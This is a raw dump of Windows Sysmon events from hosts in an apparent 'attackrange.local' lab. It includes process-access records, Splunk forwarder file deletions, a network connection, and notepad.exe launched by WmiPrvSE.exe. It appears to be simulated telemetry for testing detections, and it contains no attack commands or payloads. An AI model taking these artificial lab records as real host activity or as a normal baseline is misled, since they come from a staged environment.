12:25:32.258{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441500Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:33.955{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CA41E839F85A188244108C3ABE16AB0,SHA256=81CA4E5CAC32E5BC83A49EDA91BC335C551D2D3BE02DC273DD96186628816A7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293161Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.891{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0996801803DB5CD68760A1FA12B6DEA1,SHA256=FE56C04BDB1455E2686B705927D2E3EC6E9A0F5D8EA7FD0C45006D1DCEE3068E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293160Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.891{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A905E17FDEA0689C931E197CD82349CA,SHA256=D6C0A5FEC7674F7796FA8E50321B7FD6BE718C8D010E866F1318A2DD4C37D244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293159Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.522{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E1510306AD5C5088378E68B5DACE146,SHA256=C4A26072B4825FCEC4AD48B68B9849B175F85A3CF28DF0EBDA32C658A80DA59F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441499Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:33.259{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441498Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:33.259{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293158Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293157Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293156Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293155Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293154Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293153Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293152Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.060{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293151Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.023{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293150Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.023{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293149Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.023{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293148Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293147Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293146Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293145Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293144Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293143Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293142Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293141Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293140Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.007{BEA10069-028A-6088-082A-00000000BB01}58404732C:\Windows\system32\wbem\wmiprvse.exe{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\system32\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274 154100x8000000000000000293139Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:33.011{BEA10069-02BD-6088-1F2A-00000000BB01}6472C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXEnotepad.exeC:\Windows\system32\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x8000000000000000441506Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:34.960{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45FB4AABF3978944ED5EFC453B35497A,SHA256=9AB932E5AF36E56A29C58DB04CCAD3D73D7B223FE50FBC9F4FF12132104F3C0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293165Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:34.843{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293164Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:34.539{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F80B698E636B22479C470BA66EA5487,SHA256=8261972665A8FAAE784CE0A721FD5563ECBD5D7800CA55980A09D0AA59E58272,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441505Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:31.546{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62430-false10.0.1.12-8000- 10341000x8000000000000000441504Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:34.260{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441503Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:34.260{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441502Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:34.117{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CEE1C1985CD2C15DFB66FB9930D5BE6,SHA256=83BA02FD63D04210EE6946F9B70C4AE3DA223495762C9B174A7A437B3E83AFF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441501Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:34.116{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9835FB8E458E8F102B4761ACF26C3F7E,SHA256=5701A849ED17D5277BD2940BA68BDBA5A76F1DB8570894230A5EB561EBC19DA9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293163Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:34.106{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft 